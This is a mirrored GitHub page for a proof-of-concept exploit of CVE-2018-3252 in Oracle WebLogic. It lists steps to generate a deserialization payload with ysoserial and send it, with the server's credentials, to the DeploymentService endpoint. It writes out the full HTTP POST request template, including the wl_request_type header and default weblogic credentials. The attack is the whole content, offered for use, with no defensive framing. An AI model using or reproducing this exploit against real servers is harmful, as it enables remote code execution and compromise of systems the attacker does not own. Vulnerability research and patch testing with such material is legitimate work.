pyn3rd / CVE-2018-3252

CVE-2018-3252-PoC

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

CVE-2018-3252-PoC

1.Generate PoC with YSOSERIAL

2.You should know the USERNAME and PASSWORD of the target weblogic server

3.Send the payload to the URL

POST /bea_wls_deployment_internal/DeploymentService HTTP/1.1
Host: 127.0.0.1:7001
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
wl_request_type: data_transfer_request
username: weblogic
password: weblogic
serverName: pyn3rd
deployment_request_id: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.75 Safari/537.36 QQBrowser/4.1.4132.400
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Connection: close
Content-Length: 3334

About

CVE-2018-3252-PoC


Languages

Language:Java 100.0%